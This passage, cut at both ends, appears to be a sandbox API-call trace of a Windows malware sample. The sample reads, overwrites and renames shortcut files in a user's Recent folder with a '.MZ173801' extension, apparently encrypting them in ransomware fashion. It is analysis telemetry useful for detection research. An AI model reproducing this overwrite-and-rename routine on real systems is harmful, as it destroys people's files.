DQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0106.726] GetCurrentThreadId () returned 0x1358 [0106.726] GetCurrentThreadId () returned 0x1358 [0106.726] GetCurrentThreadId () returned 0x1358 [0106.726] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\7CvyycdQ.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\7cvyycdq.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0106.726] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0106.726] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0106.726] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x3d1 [0106.726] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0106.726] ReadFile (in: hFile=0x3f4, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x3d1, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f9b0*=0x3d1, lpOverlapped=0x0) returned 1 [0106.891] CloseHandle (hObject=0x3f4) returned 1 [0106.891] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\7CvyycdQ.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\7cvyycdq.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0106.901] WriteFile (in: hFile=0x3f4, lpBuffer=0x2434c90*, nNumberOfBytesToWrite=0x3d1, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2434c90*, lpNumberOfBytesWritten=0x19f9bc*=0x3d1, lpOverlapped=0x0) returned 1 [0106.901] CloseHandle (hObject=0x3f4) returned 1 [0106.903] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\7CvyycdQ.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\7cvyycdq.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\7CvyycdQ.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\7cvyycdq.lnk.mz173801")) returned 1 [0106.903] GetCurrentThreadId () returned 0x1358 [0106.903] GetCurrentThreadId () returned 0x1358 [0106.903] GetCurrentThreadId () returned 0x1358 [0106.903] GetCurrentThreadId () returned 0x1358 [0106.903] GetCurrentThreadId () returned 0x1358 [0106.903] GetCurrentThreadId () returned 0x1358 [0106.903] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeab95143, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xeab95143, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xeab95143, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x3c4, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="7L1WKCQLeheP.lnk", cAlternateFileName="7L1WKC~1.LNK")) returned 1 [0106.903] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0106.903] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0106.904] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\7L1WKCQLeheP.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\7l1wkcqlehep.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeab95143, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xeab95143, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xeab95143, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x3c4)) returned 1 [0106.904] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0106.904] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0106.904] GetCurrentThreadId () returned 0x1358 [0106.904] GetCurrentThreadId () returned 0x1358 [0106.904] GetCurrentThreadId () returned 0x1358 [0106.905] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0106.905] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0106.905] GetCurrentThreadId () returned 0x1358 [0106.905] GetCurrentThreadId () returned 0x1358 [0106.905] GetCurrentThreadId () returned 0x1358 [0106.905] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\7L1WKCQLeheP.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\7l1wkcqlehep.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0106.905] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0106.905] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0106.905] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x3c4 [0106.905] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0106.905] ReadFile (in: hFile=0x3f4, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x3c4, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f9b0*=0x3c4, lpOverlapped=0x0) returned 1 [0106.906] CloseHandle (hObject=0x3f4) returned 1 [0106.906] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\7L1WKCQLeheP.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\7l1wkcqlehep.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0106.907] WriteFile (in: hFile=0x3f4, lpBuffer=0x2434c90*, nNumberOfBytesToWrite=0x3c4, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2434c90*, lpNumberOfBytesWritten=0x19f9bc*=0x3c4, lpOverlapped=0x0) returned 1 [0106.908] CloseHandle (hObject=0x3f4) returned 1 [0106.909] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\7L1WKCQLeheP.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\7l1wkcqlehep.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\7L1WKCQLeheP.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\7l1wkcqlehep.lnk.mz173801")) returned 1 [0106.910] GetCurrentThreadId () returned 0x1358 [0106.910] GetCurrentThreadId () returned 0x1358 [0106.910] GetCurrentThreadId () returned 0x1358 [0106.910] GetCurrentThreadId () returned 0x1358 [0106.910] GetCurrentThreadId () returned 0x1358 [0106.910] GetCurrentThreadId () returned 0x1358 [0106.910] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeacc6b10, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xeacc6b10, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xeacc6b10, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x592, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="8MMQ.lnk", cAlternateFileName="")) returned 1 [0106.910] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0106.910] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0106.910] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\8MMQ.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\8mmq.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeacc6b10, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xeacc6b10, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xeacc6b10, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x592)) returned 1 [0106.910] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0106.910] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0106.910] GetCurrentThreadId () returned 0x1358 [0106.911] GetCurrentThreadId () returned 0x1358 [0106.911] GetCurrentThreadId () returned 0x1358 [0106.911] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0106.911] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, 